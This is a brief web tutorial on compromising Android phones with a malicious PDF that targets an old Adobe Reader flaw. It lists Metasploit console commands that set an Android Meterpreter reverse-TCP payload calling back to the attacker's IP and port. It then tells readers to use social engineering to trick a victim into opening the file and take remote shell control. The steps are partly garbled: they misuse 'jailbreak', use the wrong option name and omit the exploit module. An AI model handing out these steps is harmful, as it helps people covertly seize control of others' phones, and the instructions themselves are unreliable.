Hack Android With PDF
hack android with PDF file Please note that this is an old vulnerability that has been fixed and does not work on newer phones. But older phones are still vulnerable to this attack.
This tip works with Adobe Reader 11.2.0 and below on Android devices. This is a remote code execution vulnerability in Adobe Reader that could help us gain control of an Android device via a malicious PDF generated with Metasploit.
Steps To Hack Android With PDF
Follow The Steps Below To Hack Android With PDF.
Step – 1
Start your Kali Linux computer and open the Metasploit console to start jailbreaking Android with a pdf file.
Step – 2
To generate a malicious PDF file, enter the following commands in the MSF console:
set payload android/meterpreter/reverse_tcp
set lhost 192.168.192.166 (Your IP here)
set port 20068
Step – 3
Now that the malicious PDF is ready. Use social engineering to send a malicious PDF to the victim.
You can use any PDF editor to edit the file and add content to make it look more realistic.
The folder path
Step – 4
In my case, this is a pdf file eninja.pdf, but you can always change the name to whatever the victim will click on.
Note – This attack only works on limited Android devices with vulnerable webview API and older versions of Adobe Reader.
As soon as the victim opens the malicious PDF, the Android phone will be jailbroken and we can access the shell on our Kali machine and you can control it remotely using the meterpreter shell. This is how easy it is to hack an Android device with a pdf file.